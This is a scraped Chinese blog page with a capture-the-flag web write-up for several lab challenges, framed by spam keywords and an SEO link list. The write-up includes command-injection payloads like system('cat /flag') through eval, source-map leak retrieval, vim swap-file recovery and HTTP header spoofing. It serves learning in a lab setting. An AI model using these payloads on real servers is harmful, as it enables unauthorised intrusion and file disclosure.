国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁 > news >正文

做同性戀的珠寶網(wǎng)站尋找外貿(mào)客戶的網(wǎng)站

做同性戀的珠寶網(wǎng)站,尋找外貿(mào)客戶的網(wǎng)站,十大電子元器件采購商城,app項目策劃書[Baby] SignIn 進來看到 按鈕點擊不了,想到去修改代碼,要“檢查“,但這里的右鍵和F12都不可用 還好還有其他方法 檢查的各種方法 選用一種后進入檢查頁面 刪掉這里的disabled即可 點擊后得到flag [Baby] Backdoor 進入&#xff0c…

[Baby] SignIn

進來看到
在這里插入圖片描述

按鈕點擊不了,想到去修改代碼,要“檢查“,但這里的右鍵和F12都不可用
還好還有其他方法
檢查的各種方法

選用一種后進入檢查頁面
在這里插入圖片描述

刪掉這里的disabled即可
在這里插入圖片描述

點擊后得到flag
在這里插入圖片描述

[Baby] Backdoor

進入,看到
在這里插入圖片描述

有eval,利用命令執(zhí)行漏洞

cnss=system('ls /');

在這里插入圖片描述

獲取flag文件夾里的文件名:

cnss=system('ls /flag');

在這里插入圖片描述

獲取flag:

cnss=system('cat //flag');

在這里插入圖片描述

[Baby] Webpack

了解一下什么是Webpack,及其有什么漏洞

Webpack是一個用于構(gòu)建現(xiàn)代Web應(yīng)用程序的開源JavaScript模塊打包工具。它可以將多個JavaScript、CSS、圖片等資源打包成一個或多個優(yōu)化后的bundle文件,以提高應(yīng)用程序的性能和加載速度。Webpack通過模塊化的方式管理代碼,使開發(fā)者可以以模塊化的方式編寫代碼,然后通過Webpack將這些模塊打包成可在瀏覽器中執(zhí)行的代碼。

可能有源代碼泄漏:不正確的配置可能導(dǎo)致打包后的源代碼在生產(chǎn)環(huán)境中被泄漏。這道題就是此漏洞,具體利用方式如下:

進入題目,看到
在這里插入圖片描述

檢查,找到.js文件
在這里插入圖片描述
知道其路徑為:http://124.221.34.13:50003/static/js/main.c91fb7d1.js

訪問http://124.221.34.13:50003/static/js/main.c91fb7d1.js.map,就成功下載了源代碼
在這里插入圖片描述

此文件還需要還原,先安裝工具
如何還原前端代碼

請隨便選一個文件夾(記得把源代碼移進去),打開cmd
在這里插入圖片描述在這里插入圖片描述

還原:reverse-sourcemap -v main.c91fb7d1.js.map -o output,得到還原后的代碼
在這里插入圖片描述在這里插入圖片描述
找到flag
在這里插入圖片描述

[Easy] Leak

得看一下題目描述
在這里插入圖片描述

先了解一下上面情況會出現(xiàn)什么漏洞:
使用vim時會創(chuàng)建臨時緩存文件,關(guān)閉vim時緩存文件則會被刪除

當(dāng)vim異常退出后,因為未處理緩存文件,導(dǎo)致可以通過緩存文件恢復(fù)原始文件內(nèi)容

以 index.php 為例:第一次產(chǎn)生的交換文件名為 .index.php.swp

再次意外退出后,將會產(chǎn)生名為 .index.php.swo 的交換文件

第三次產(chǎn)生的交換文件則為 .index.php.swn
——————————
來獲取.index.php.swp,并整理其中代碼
在這里插入圖片描述

查看根目錄文件:

/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=system('ls /');

在這里插入圖片描述

得到flag:

/?cnss@30fc5b20a309996f3ab12662e3c4ac932c08db7f=system('cat  /fl4444444g');

在這里插入圖片描述

[Easy] ezhttp

進來,看到
在這里插入圖片描述

http的題目一般來說直接抓包,再去一步一步地滿足要求
1
在這里插入圖片描述
在文件開頭把GET修改為CNSS

CNSS /Index HTTP/1.1

2
在這里插入圖片描述
修改User-Agent

User-Agent: Mozilla/5.0 (Linux; Android 10; XXX Build/QKQ1.190910.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 MicroMessenger/8.0.0.1920(0x2800004D) Process/appbrand2 WeChat/arm32

3
在這里插入圖片描述
修改Referer

Referer:cnss.io

4
在這里插入圖片描述
修改X-Forwarded-For

X-Forwarded-For:127.0.0.1

5
在這里插入圖片描述
修改HOST

Host: uestc.edu.cn

6
在這里插入圖片描述
修改Content-Type

Content-Type: application/json

7
在這里插入圖片描述在最下面胡亂輸入
在這里插入圖片描述
8
在這里插入圖片描述
給一個json數(shù)據(jù)

{"name": "Alice","age": 25
}

9
在這里插入圖片描述
把一個數(shù)據(jù)命名為password

{"password": "Alice","age": 25
}

10
在這里插入圖片描述
把一個數(shù)據(jù)命名為name

{"name": "Alice","password": "25"
}

11
在這里插入圖片描述
json和Cookie改為相同
在這里插入圖片描述

12
在這里插入圖片描述
先了解如何在HTTP請求中表示Basic認(rèn)證:

構(gòu)建認(rèn)證字符串:將用戶名和密碼用冒號分隔,然后將該字符串進行Base64編碼。例如,如果用戶名是 "username",密碼是 "password",您可以將它們合并并進行Base64編碼得到 "dXNlcm5hbWU6cGFzc3dvcmQ="。添加認(rèn)證頭部:將Base64編碼后的認(rèn)證字符串添加到HTTP請求頭的 "Authorization" 字段中,使用 "Basic" 前綴。 Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=

方法:修改Authorization

Authorization: Basic MTIzOjEyMzQ1Ng==

————————————————————
得到flag咯:
在這里插入圖片描述

http://m.aloenet.com.cn/news/873.html

相關(guān)文章:

  • 人大網(wǎng)站建設(shè)報價單湖北網(wǎng)站seo
  • 建設(shè)的網(wǎng)站搜索引擎關(guān)鍵詞優(yōu)化
  • wordpress 融資谷歌seo網(wǎng)絡(luò)公司
  • 貴陽網(wǎng)站建設(shè)服務(wù)公司網(wǎng)站注冊查詢
  • 新手網(wǎng)站百度seo規(guī)則
  • 小程序開發(fā)平臺哪家產(chǎn)品較好汕頭seo快速排名
  • 有沒有專門做設(shè)計的網(wǎng)站外貿(mào)seo建站
  • 伍佰億網(wǎng)站怎么做2020年可用好用的搜索引擎
  • 圖躍網(wǎng)站建設(shè)國外網(wǎng)站開發(fā)
  • seo網(wǎng)站推廣優(yōu)化站長工具綜合查詢官網(wǎng)
  • 網(wǎng)站建設(shè)公司怎么賺錢網(wǎng)絡(luò)宣傳推廣
  • php與dw怎么做校園網(wǎng)站seo教程
  • 備案期間怎么做網(wǎng)站十大搜索引擎
  • 寧波網(wǎng)站建設(shè) 熊掌號服務(wù)營銷策略
  • be設(shè)計網(wǎng)站自己開發(fā)網(wǎng)站
  • 時尚字體設(shè)計網(wǎng)站網(wǎng)絡(luò)營銷推廣的方式
  • 樂清網(wǎng)站建設(shè)公司網(wǎng)絡(luò)軟文營銷案例3篇
  • 免費網(wǎng)站建設(shè)加盟亞洲衛(wèi)星電視網(wǎng)參數(shù)表
  • 網(wǎng)站建設(shè) 中企動力公司搭建網(wǎng)站的步驟和順序
  • 網(wǎng)站app開發(fā)平臺百度非企渠道開戶
  • 孝感網(wǎng)站開發(fā)的公司電話集客營銷軟件
  • 攀枝花建設(shè)工程有限責(zé)任公司網(wǎng)站一元友情鏈接平臺
  • 池州專業(yè)網(wǎng)站建設(shè)谷歌搜索引擎鏡像
  • 網(wǎng)站設(shè)計 電子購物網(wǎng)站設(shè)計網(wǎng)絡(luò)精準(zhǔn)推廣
  • 電商網(wǎng)站建設(shè)推廣企業(yè)網(wǎng)絡(luò)規(guī)劃設(shè)計方案
  • 網(wǎng)站建設(shè)的結(jié)論和體會百度推廣營銷中心
  • 柳州正規(guī)網(wǎng)站制作公司發(fā)稿網(wǎng)
  • 牛街網(wǎng)站建設(shè)免費網(wǎng)站推廣軟件哪個好
  • 電子書籍網(wǎng)站開發(fā)推廣鏈接點擊器網(wǎng)頁
  • 如何開一個微信公眾號seo顧問合同